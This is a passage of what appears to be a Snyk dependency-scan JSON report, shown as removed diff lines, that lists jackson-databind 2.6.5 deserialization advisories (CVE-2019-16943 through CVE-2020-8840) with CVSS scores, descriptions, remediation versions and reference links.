Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": 